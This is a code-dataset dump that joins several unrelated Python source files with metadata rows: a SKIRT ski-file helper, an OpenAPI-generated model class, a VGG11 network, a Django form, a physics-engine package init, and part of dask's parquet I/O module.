# Set the inclination
set_quantity(instrument, "inclination", value)
## This function returns the azimuth angle of the specified instrument as an Astropy Angle.
def get_instrument_azimuth(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Return the azimuth
return get_quantity(instrument, "azimuth")
## This function sets the azimuth angle of the specified instrument. The angle should be an Astropy Angle or quantity.
def set_instrument_azimuth(self, name, value):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the azimuth angle
set_quantity(instrument, "azimuth", value)
## This function returns the position angle of the specified instrument as an Astropy Angle.
def get_instrument_pa(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Return the position angle
return get_quantity(instrument, "positionAngle")
## This function sets the position angle of the specified instrument. The angle should be an Astropy Angle or quantity.
def set_instrument_pa(self, name, value):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the position angle
set_quantity(instrument, "positionAngle", value)
## This function sets the orientation of the specified instrument. The angles should be Astropy Angle or Quantity instances.
def set_instrument_orientation(self, name, inclination, position_angle, azimuth):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the inclination
set_quantity(instrument, "inclination", inclination)
set_quantity(instrument, "positionAngle", position_angle)
set_quantity(instrument, "azimuth", azimuth)
## This function sets the orientation of the specified instrument to a face-on orientation.
def set_instrument_orientation_faceon(self, name):
from astropy.coordinates import Angle
# XY plane
inclination = Angle(0., "deg")
position_angle = Angle(90., "deg")
azimuth = Angle(0.0, "deg")
# Set the angles
self.set_instrument_orientation(name, inclination, position_angle, azimuth)
## This function sets the orientation of the specified instrument to an edge-on orientation
def set_instrument_orientation_edgeon(self, name):
from astropy.coordinates import Angle
# XZ plane
inclination = Angle(90., "deg")
position_angle = Angle(0., "deg")
azimuth = Angle(-90., "deg")
# Set the angles
self.set_instrument_orientation(name, inclination, position_angle, azimuth)
## This function returns the size of the specified instrument as a tuple (size_x, size_y)
def get_instrument_size(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Return the size
return int(instrument.get("pixelsX")), int(instrument.get("pixelsY"))
## This function sets the size of the specified instrument
def set_instrument_size(self, name, x_size, y_size):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the size
instrument.set("pixelsX", str(x_size))
instrument.set("pixelsY", str(y_size))
## This function returns the field of view of the specified instrument as a tuple (field_x, field_y)
def get_instrument_field(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Get the field of view
return get_quantity(instrument, "fieldOfViewX"), get_quantity(instrument, "fieldOfViewY")
## This function sets the field of view of the specified instrument
def set_instrument_field(self, name, x_field, y_field):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the field of view
set_quantity(instrument, "fieldOfViewX", x_field)
set_quantity(instrument, "fieldOfViewY", y_field)
## This (experimental) function converts the ski file structure into a (nested) python dictionary
def to_dict(self):
return recursive_dict(self.tree.getroot())
## This (experimental) function converts the ski file structure into json format
def to_json(self):
"""
This function returns the ski file to a json format
:return:
"""
import json
return json.dumps(self.to_dict())
## This function returns the xml tree element with the specified name that is at the base level of the simulation hierarchy
def get_unique_base_element(self, name):
return get_unique_element(self.tree.getroot(), "//"+name)
# -----------------------------------------------------------------
## This function returns the value of a certain parameter of the specified tree element as an Astropy quantity. The
# default unit can be specified which is used when the unit is not described in the ski file.
def get_quantity(self, element, name, default_unit=None):
# Import Astropy here to avoid import errors for this module for users without an Astropy installation
from astropy.units import Unit
splitted = element.get(name).split()
value = float(splitted[0])
try:
unit = splitted[1]
except IndexError:
unit = default_unit
# Create a quantity object
if unit is not None: value = value * Unit(unit)
return value
# -----------------------------------------------------------------
## This function sets the value of a certain parameter of the specified tree element from an Astropy quantity.
def set_quantity(self, element, name, value, default_unit=None):
# Import Astropy here to avoid import errors for this module for users without an Astropy installation
from astropy.units import Unit
try:
# If this works, assume it is a Quantity (or Angle)
unit = value.unit
# Works for Angles as well (str(angle) gives something that is not 'value + unit'
to_string = str(value.to(value.unit).value) + " " + str(unit)
except AttributeError:
if default_unit is not None:
to_string = str(value) + " " + str(Unit(default_unit))
else:
to_string = str(value) # dimensionless quantity
# Set the value in the tree element
element.set(name, to_string)
# -----------------------------------------------------------------
class LabeledSkiFile(SkiFile):
"""
This class ...
"""
## This function returns all labels
def labels(self):
labels = set()
# Loop over all elements in the tree
for element in self.tree.getiterator():
# Loop over the settings of the element
for setting_name, setting_value in element.items():
if setting_value.startswith("[") and setting_value.endswith("]"):
label = setting_value.split("[")[1].split(":")[0]
labels.add(label)
# Return the list of labels
return list(labels)
# -----------------------------------------------------------------
def labeled_values(self):
"""
This function ...
:return:
"""
values = dict()
# Loop over all elements in the tree
for element in self.tree.getiterator():
# Loop over the settings of the element
for setting_name, setting_value in element.items():
if setting_value.startswith("[") and setting_value.endswith("]"):
label = setting_value.split("[")[1].split(":")[0]
value = self.get_quantity(element, setting_name)
if label in values and values[label] != value: warnings.warn("The '" + label + "' property has different values throughout the SkiFile (" + str(values[label]) + " and " + str(value) + ")")
else: values[label] = value
return values
# -----------------------------------------------------------------
def delabel(self, label):
"""
This function removes the label from a certain property
:param label:
:return:
"""
# Loop over all elements in the tree
for element in self.tree.getiterator():
# Loop over the settings of the element
for setting_name, setting_value in element.items():
if setting_value.startswith("[") and setting_value.endswith("]"):
label_item = setting_value.split("[")[1].split(":")[0]
value_item = setting_value[1:-1].split(":")[1]
if label == label_item: element.set(setting_name, value_item)
# -----------------------------------------------------------------
# Overwrite the default implementation in SkiFile to incorporate labeled properties
def get_quantity(self, element, name, default_unit=None):
# Import Astropy here to avoid import errors for this module for users without an Astropy installation
from astropy.units import Unit
prop = element.get(name)
if prop.startswith("[") and prop.endswith("]"): prop = prop[1:-1].split(":")[1]
splitted = prop.split()
value = float(splitted[0])
try: unit = splitted[1]
except IndexError: unit = default_unit
# Create a quantity object
if unit is not None: value = value * Unit(unit)
return value
# -----------------------------------------------------------------
# Overwrite the default implementation in SkiFile to incorporate labeled properties
def set_quantity(self, element, name, value, default_unit=None):
pass
# -----------------------------------------------------------------
## This function returns the xml tree element with the specified name that is a child of the specified element
def get_unique_element(element, name):
# Get child element of the given element
parents = element.xpath(name)
# Check if only one child element is present
if len(parents) == 0: raise ValueError("Invalid ski file: no '" + name + "' elements within '" + element.tag + "'")
elif len(parents) > 1: raise ValueError("Invalid ski file: multiple '" + name + "' elements within '" + element.tag + "'")
parents = parents[0]
# Check if only one child object is present
if len(parents) == 0: raise ValueError("Invalid ski file: no '" + name + "' elements within '" + element.tag + "'")
elif len(parents) > 1: raise ValueError("Invalid ski file: multiple '" + name + "' elements within '" + element.tag + "'")
child = parents[0]
# Return the child element
return child
# -----------------------------------------------------------------
def recursive_dict(element):
return element.tag, dict(map(recursive_dict, element)) or element.text
# -----------------------------------------------------------------
def str_from_angle(angle):
try: return str(angle.to("deg").value) + " deg"
except AttributeError: return str(angle)
# -----------------------------------------------------------------
def str_from_quantity(quantity, unit=None):
if unit is not None:
if not quantity.__class__.__name__ == "Quantity": raise ValueError("Value is not a quantity, so unit cannot be converted")
return str(quantity.to(unit).value)
elif quantity.__class__.__name__ == "Quantity":
to_string = str(quantity.value) + " " + str(quantity.unit).replace(" ", "")
return to_string.replace("solMass", "Msun").replace("solLum", "Lsun")
else:
warnings.warn("The given value is not a quantity but a scalar value. No guarantee can be given that the parameter value"
"is specified in the correct unit")
return str(quantity)
# -----------------------------------------------------------------
def str_from_bool(boolean):
return str(boolean).lower()
# -----------------------------------------------------------------
def add_properties(element, dictionary):
for key, value in element.items(): dictionary[key] = value
# -----------------------------------------------------------------
def add_children(element, dictionary):
"""
This function ...
:param element:
:param dictionary:
:return:
"""
dictionary["children"] = dict()
for child in element.getchildren():
dictionary["children"][child.tag] = dict()
add_properties(child, dictionary["children"][child.tag])
add_children(child, dictionary["children"][child.tag])
# -----------------------------------------------------------------
def get_properties(element):
"""
This function ...
:param element:
:return:
"""
properties = dict()
add_properties(element, properties)
add_children(element, properties)
return properties
# -----------------------------------------------------------------
| 42.053465
| 208
| 0.654094
|
017d1e8e2a18720acae8c18a620590c279a3188d
| 11,439
|
py
|
Python
|
code/python/AxiomaEquityOptimizer/v3/fds/sdk/AxiomaEquityOptimizer/model/account_directories.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/AxiomaEquityOptimizer/v3/fds/sdk/AxiomaEquityOptimizer/model/account_directories.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/AxiomaEquityOptimizer/v3/fds/sdk/AxiomaEquityOptimizer/model/account_directories.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
Axioma Equity API
Allow clients to fetch Analytics through APIs. # noqa: E501
The version of the OpenAPI document: 3
Contact: analytics.api.support@factset.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from fds.sdk.AxiomaEquityOptimizer.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from fds.sdk.AxiomaEquityOptimizer.exceptions import ApiAttributeError
class AccountDirectories(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'accounts': ([str],), # noqa: E501
'directories': ([str],), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'accounts': 'accounts', # noqa: E501
'directories': 'directories', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""AccountDirectories - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
accounts ([str]): List of account and composite files.. [optional] # noqa: E501
directories ([str]): List of directories.. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""AccountDirectories - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
accounts ([str]): List of account and composite files.. [optional] # noqa: E501
directories ([str]): List of directories.. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| 43.827586
| 121
| 0.571728
|
3b99b0ce80c00519fe5f1e5ea1d814642c8b15a0
| 333
|
py
|
Python
|
experiments/GTSRB/net.py
|
k-yossy90229/Distillation-for-mitigating-backdoor-attack
|
691332f54acafbc5e9c4e6495f670805ff622bae
|
[
"MIT"
] | null | null | null |
experiments/GTSRB/net.py
|
k-yossy90229/Distillation-for-mitigating-backdoor-attack
|
691332f54acafbc5e9c4e6495f670805ff622bae
|
[
"MIT"
] | null | null | null |
experiments/GTSRB/net.py
|
k-yossy90229/Distillation-for-mitigating-backdoor-attack
|
691332f54acafbc5e9c4e6495f670805ff622bae
|
[
"MIT"
] | 1
|
2020-12-10T14:14:16.000Z
|
2020-12-10T14:14:16.000Z
|
import torchvision
from torch import nn
def CNV():
CNV = torchvision.models.vgg11(pretrained=False)
CNV.classifier = nn.Sequential(
nn.Linear(25088, 4096),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5),
nn.Linear(4096, 43)
)
return CNV
| 20.8125
| 50
| 0.657658
|
12b7ad33f96c4680823cb5acc33272a0131903f7
| 283
|
py
|
Python
|
test_project/select2_taggit/forms.py
|
epoiate/django-autocomplete-light
|
6cefd5ea73d1ef2c1c800cd1fdcf6cc6fbe27886
|
[
"MIT"
] | 1,368
|
2015-01-03T09:52:33.000Z
|
2022-03-27T09:06:00.000Z
|
test_project/select2_taggit/forms.py
|
epoiate/django-autocomplete-light
|
6cefd5ea73d1ef2c1c800cd1fdcf6cc6fbe27886
|
[
"MIT"
] | 919
|
2015-01-01T05:17:48.000Z
|
2022-03-25T22:41:14.000Z
|
test_project/select2_taggit/forms.py
|
epoiate/django-autocomplete-light
|
6cefd5ea73d1ef2c1c800cd1fdcf6cc6fbe27886
|
[
"MIT"
] | 469
|
2015-01-19T21:40:30.000Z
|
2022-03-26T17:27:40.000Z
|
from dal import autocomplete
from django import forms
from .models import TModel
class TForm(forms.ModelForm):
class Meta:
model = TModel
fields = ('name', 'test')
widgets = {
'test': autocomplete.TaggitSelect2('select2_taggit')
}
| 18.866667
| 64
| 0.621908
|
47f9127686f7375f4975b193e71bc2baf2cb659e
| 1,946
|
py
|
Python
|
build/lib/pie4t/__init__.py
|
beardad1975/pie4t
|
7da08596dc4ac36a8f643cd682a7232623dd17a0
|
[
"MIT"
] | 1
|
2019-12-05T04:10:24.000Z
|
2019-12-05T04:10:24.000Z
|
pie4t/__init__.py
|
beardad1975/pie4t
|
7da08596dc4ac36a8f643cd682a7232623dd17a0
|
[
"MIT"
] | null | null | null |
pie4t/__init__.py
|
beardad1975/pie4t
|
7da08596dc4ac36a8f643cd682a7232623dd17a0
|
[
"MIT"
] | null | null | null |
from . import common
from .engine import PhysicsEngine
物理引擎 = PhysicsEngine
__all__ = [
'add_circle', '新增圓球', '物理引擎',
'simulate', '模擬主迴圈','模擬進行中', '移除',
'add_segment','新增線段','add_box','新增方塊',
]
######## top level function
def add_circle(*args, **kwargs):
if not common.is_engine_created:
PhysicsEngine()
return common.stage.新增圓球(*args, **kwargs)
新增圓球 = add_circle
def add_box(*args, **kwargs):
if not common.is_engine_created:
PhysicsEngine()
return common.stage.新增方塊(*args, **kwargs)
新增方塊 = add_box
def add_segment(*args, **kwargs):
if not common.is_engine_created:
PhysicsEngine()
return common.stage.新增線段(*args, **kwargs)
新增線段 = add_segment
def 移除(obj):
if not common.is_engine_created:
PhysicsEngine()
return common.stage.移除(obj)
def simulate():
if not common.is_engine_created:
PhysicsEngine()
common.stage.simulate()
模擬主迴圈 = simulate
模擬進行中 = simulate
#def module_init():
# module reference
#__main__.pie4t_module = sys.modules['pie4t']
## check batch mode
# had __file__ and import pie4t in files
# if hasattr(__main__ , '__file__') and __main__.__file__.endswith('py'):
# #print('has __file__')
# try:
# with open(__main__.__file__, encoding='utf8') as f:
# lines = f.readlines()
# for i in lines:
# if 'import' in i and 'pie4t' in i:
# __main__.pie4t_module.is_batch_mode = True
# print(__file__, ': is batch mode,')
# break
# except FileNotFoundError:
# pass
# create game win
#__main__.pie4t_module.game_win = PhysicsEngine()
#__main__.pie4t_module.is_initialized = True
### module init
#module_init()
if __name__ == '__main__' :
pass
| 20.484211
| 77
| 0.584789
|
e90011d268e2ff481a89022509343b146d393d43
| 29,040
|
py
|
Python
|
dask/dataframe/io/parquet/core.py
|
srijan-deepsource/dask
|
0673d9084e02f985f3fdf5ba6ede80e8de5ac15c
|
[
"BSD-3-Clause"
] | 20
|
2015-01-19T14:04:10.000Z
|
2020-01-14T03:43:19.000Z
|
dask/dataframe/io/parquet/core.py
|
srijan-deepsource/dask
|
0673d9084e02f985f3fdf5ba6ede80e8de5ac15c
|
[
"BSD-3-Clause"
] | 12
|
2015-01-22T22:00:43.000Z
|
2020-07-28T19:22:16.000Z
|
dask/dataframe/io/parquet/core.py
|
srijan-deepsource/dask
|
0673d9084e02f985f3fdf5ba6ede80e8de5ac15c
|
[
"BSD-3-Clause"
] | 7
|
2015-01-04T18:50:00.000Z
|
2020-07-29T11:00:04.000Z
|
from distutils.version import LooseVersion
import tlz as toolz
import warnings
from ....bytes import core # noqa
from fsspec.core import get_fs_token_paths
from fsspec.utils import stringify_path
from ...core import DataFrame, new_dd_object
from ....base import tokenize
from ....utils import import_required, natural_sort_key, parse_bytes
from collections.abc import Mapping
from ...methods import concat
try:
import snappy
snappy.compress
except (ImportError, AttributeError):
snappy = None
__all__ = ("read_parquet", "to_parquet")
NONE_LABEL = "__null_dask_index__"
# ----------------------------------------------------------------------
# User API
class ParquetSubgraph(Mapping):
"""
Subgraph for reading Parquet files.
Enables optimizations (see optimize_read_parquet_getitem).
"""
def __init__(self, name, engine, fs, meta, columns, index, parts, kwargs):
self.name = name
self.engine = engine
self.fs = fs
self.meta = meta
self.columns = columns
self.index = index
self.parts = parts
self.kwargs = kwargs
def __repr__(self):
return "ParquetSubgraph<name='{}', n_parts={}, columns={}>".format(
self.name, len(self.parts), list(self.columns)
)
def __getitem__(self, key):
try:
name, i = key
except ValueError:
# too many / few values to unpack
raise KeyError(key) from None
if name != self.name:
raise KeyError(key)
if i < 0 or i >= len(self.parts):
raise KeyError(key)
part = self.parts[i]
if not isinstance(part, list):
part = [part]
return (
read_parquet_part,
self.engine.read_partition,
self.fs,
self.meta,
[p["piece"] for p in part],
self.columns,
self.index,
toolz.merge(part[0]["kwargs"], self.kwargs or {}),
)
def __len__(self):
return len(self.parts)
def __iter__(self):
for i in range(len(self)):
yield (self.name, i)
def read_parquet(
path,
columns=None,
filters=None,
categories=None,
index=None,
storage_options=None,
engine="auto",
gather_statistics=None,
split_row_groups=None,
chunksize=None,
**kwargs
):
"""
Read a Parquet file into a Dask DataFrame
This reads a directory of Parquet data into a Dask.dataframe, one file per
partition. It selects the index among the sorted columns if any exist.
Parameters
----------
path : string or list
Source directory for data, or path(s) to individual parquet files.
Prefix with a protocol like ``s3://`` to read from alternative
filesystems. To read from multiple files you can pass a globstring or a
list of paths, with the caveat that they must all have the same
protocol.
columns : string, list or None (default)
Field name(s) to read in as columns in the output. By default all
non-index fields will be read (as determined by the pandas parquet
metadata, if present). Provide a single field name instead of a list to
read in the data as a Series.
filters : Union[List[Tuple[str, str, Any]], List[List[Tuple[str, str, Any]]]]
List of filters to apply, like ``[[('x', '=', 0), ...], ...]``. This
implements partition-level (hive) filtering only, i.e., to prevent the
loading of some row-groups and/or files.
Predicates can be expressed in disjunctive normal form (DNF). This means
that the innermost tuple describes a single column predicate. These
inner predicates are combined with an AND conjunction into a larger
predicate. The outer-most list then combines all of the combined
filters with an OR disjunction.
Predicates can also be expressed as a List[Tuple]. These are evaluated
as an AND conjunction. To express OR in predictates, one must use the
(preferred) List[List[Tuple]] notation.
index : string, list, False or None (default)
Field name(s) to use as the output frame index. By default will be
inferred from the pandas parquet file metadata (if present). Use False
to read all fields as columns.
categories : list, dict or None
For any fields listed here, if the parquet encoding is Dictionary,
the column will be created with dtype category. Use only if it is
guaranteed that the column is encoded as dictionary in all row-groups.
If a list, assumes up to 2**16-1 labels; if a dict, specify the number
of labels expected; if None, will load categories automatically for
data written by dask/fastparquet, not otherwise.
storage_options : dict
Key/value pairs to be passed on to the file-system backend, if any.
engine : {'auto', 'fastparquet', 'pyarrow'}, default 'auto'
Parquet reader library to use. If only one library is installed, it
will use that one; if both, it will use 'fastparquet'
gather_statistics : bool or None (default).
Gather the statistics for each dataset partition. By default,
this will only be done if the _metadata file is available. Otherwise,
statistics will only be gathered if True, because the footer of
every file will be parsed (which is very slow on some systems).
split_row_groups : bool or int
Default is True if a _metadata file is available or if
the dataset is composed of a single file (otherwise defult is False).
If True, then each output dataframe partition will correspond to a single
parquet-file row-group. If False, each partition will correspond to a
complete file. If a positive integer value is given, each dataframe
partition will correspond to that number of parquet row-groups (or fewer).
Only the "pyarrow" engine supports this argument.
chunksize : int, str
The target task partition size. If set, consecutive row-groups
from the same file will be aggregated into the same output
partition until the aggregate size reaches this value.
**kwargs: dict (of dicts)
Passthrough key-word arguments for read backend.
The top-level keys correspond to the appropriate operation type, and
the second level corresponds to the kwargs that will be passed on to
the underlying `pyarrow` or `fastparquet` function.
Supported top-level keys: 'dataset' (for opening a `pyarrow` dataset),
'file' (for opening a `fastparquet` `ParquetFile`), 'read' (for the
backend read function), 'arrow_to_pandas' (for controlling the arguments
passed to convert from a `pyarrow.Table.to_pandas()`)
Examples
--------
>>> df = dd.read_parquet('s3://bucket/my-parquet-data') # doctest: +SKIP
See Also
--------
to_parquet
"""
if isinstance(columns, str):
df = read_parquet(
path,
[columns],
filters,
categories,
index,
storage_options,
engine,
gather_statistics,
)
return df[columns]
if columns is not None:
columns = list(columns)
name = "read-parquet-" + tokenize(
path,
columns,
filters,
categories,
index,
storage_options,
engine,
gather_statistics,
)
if isinstance(engine, str):
engine = get_engine(engine)
if hasattr(path, "name"):
path = stringify_path(path)
fs, _, paths = get_fs_token_paths(path, mode="rb", storage_options=storage_options)
paths = sorted(paths, key=natural_sort_key) # numeric rather than glob ordering
auto_index_allowed = False
if index is None:
# User is allowing auto-detected index
auto_index_allowed = True
if index and isinstance(index, str):
index = [index]
meta, statistics, parts, index = engine.read_metadata(
fs,
paths,
categories=categories,
index=index,
gather_statistics=gather_statistics,
filters=filters,
split_row_groups=split_row_groups,
**kwargs
)
# Parse dataset statistics from metadata (if available)
parts, divisions, index, index_in_columns = process_statistics(
parts, statistics, filters, index, chunksize
)
# Account for index and columns arguments.
# Modify `meta` dataframe accordingly
meta, index, columns = set_index_columns(
meta, index, columns, index_in_columns, auto_index_allowed
)
if meta.index.name == NONE_LABEL:
meta.index.name = None
subgraph = ParquetSubgraph(name, engine, fs, meta, columns, index, parts, kwargs)
# Set the index that was previously treated as a column
if index_in_columns:
meta = meta.set_index(index)
if meta.index.name == NONE_LABEL:
meta.index.name = None
if len(divisions) < 2:
# empty dataframe - just use meta
subgraph = {(name, 0): meta}
divisions = (None, None)
return new_dd_object(subgraph, name, meta, divisions)
def read_parquet_part(func, fs, meta, part, columns, index, kwargs):
""" Read a part of a parquet dataset
This function is used by `read_parquet`."""
if isinstance(part, list):
dfs = [func(fs, rg, columns.copy(), index, **kwargs) for rg in part]
df = concat(dfs, axis=0)
else:
df = func(fs, part, columns, index, **kwargs)
if meta.columns.name:
df.columns.name = meta.columns.name
columns = columns or []
index = index or []
df = df[[c for c in columns if c not in index]]
if index == [NONE_LABEL]:
df.index.name = None
return df
def to_parquet(
df,
path,
engine="auto",
compression="default",
write_index=True,
append=False,
ignore_divisions=False,
partition_on=None,
storage_options=None,
write_metadata_file=True,
compute=True,
compute_kwargs=None,
**kwargs
):
"""Store Dask.dataframe to Parquet files
Notes
-----
Each partition will be written to a separate file.
Parameters
----------
df : dask.dataframe.DataFrame
path : string or pathlib.Path
Destination directory for data. Prepend with protocol like ``s3://``
or ``hdfs://`` for remote data.
engine : {'auto', 'fastparquet', 'pyarrow'}, default 'auto'
Parquet library to use. If only one library is installed, it will use
that one; if both, it will use 'fastparquet'.
compression : string or dict, optional
Either a string like ``"snappy"`` or a dictionary mapping column names
to compressors like ``{"name": "gzip", "values": "snappy"}``. The
default is ``"default"``, which uses the default compression for
whichever engine is selected.
write_index : boolean, optional
Whether or not to write the index. Defaults to True.
append : bool, optional
If False (default), construct data-set from scratch. If True, add new
row-group(s) to an existing data-set. In the latter case, the data-set
must exist, and the schema must match the input data.
ignore_divisions : bool, optional
If False (default) raises error when previous divisions overlap with
the new appended divisions. Ignored if append=False.
partition_on : list, optional
Construct directory-based partitioning by splitting on these fields'
values. Each dask partition will result in one or more datafiles,
there will be no global groupby.
storage_options : dict, optional
Key/value pairs to be passed on to the file-system backend, if any.
write_metadata_file : bool, optional
Whether to write the special "_metadata" file.
compute : bool, optional
If True (default) then the result is computed immediately. If False
then a ``dask.delayed`` object is returned for future computation.
compute_kwargs : dict, optional
Options to be passed in to the compute method
**kwargs :
Extra options to be passed on to the specific backend.
Examples
--------
>>> df = dd.read_csv(...) # doctest: +SKIP
>>> dd.to_parquet(df, '/path/to/output/',...) # doctest: +SKIP
See Also
--------
read_parquet: Read parquet data to dask.dataframe
"""
from dask import delayed
if compression == "default":
if snappy is not None:
compression = "snappy"
else:
compression = None
partition_on = partition_on or []
if isinstance(partition_on, str):
partition_on = [partition_on]
if set(partition_on) - set(df.columns):
raise ValueError(
"Partitioning on non-existent column. "
"partition_on=%s ."
"columns=%s" % (str(partition_on), str(list(df.columns)))
)
if isinstance(engine, str):
engine = get_engine(engine)
if hasattr(path, "name"):
path = stringify_path(path)
fs, _, _ = get_fs_token_paths(path, mode="wb", storage_options=storage_options)
# Trim any protocol information from the path before forwarding
path = fs._strip_protocol(path)
# Save divisions and corresponding index name. This is necessary,
# because we may be resetting the index to write the file
division_info = {"divisions": df.divisions, "name": df.index.name}
if division_info["name"] is None:
# As of 0.24.2, pandas will rename an index with name=None
# when df.reset_index() is called. The default name is "index",
# but dask will always change the name to the NONE_LABEL constant
if NONE_LABEL not in df.columns:
division_info["name"] = NONE_LABEL
elif write_index:
raise ValueError(
"Index must have a name if __null_dask_index__ is a column."
)
else:
warnings.warn(
"If read back by Dask, column named __null_dask_index__ "
"will be set to the index (and renamed to None)."
)
# If write_index==True (default), reset the index and record the
# name of the original index in `index_cols` (we will set the name
# to the NONE_LABEL constant if it is originally `None`).
# `fastparquet` will use `index_cols` to specify the index column(s)
# in the metadata. `pyarrow` will revert the `reset_index` call
# below if `index_cols` is populated (because pyarrow will want to handle
# index preservation itself). For both engines, the column index
# will be written to "pandas metadata" if write_index=True
index_cols = []
if write_index:
real_cols = set(df.columns)
none_index = list(df._meta.index.names) == [None]
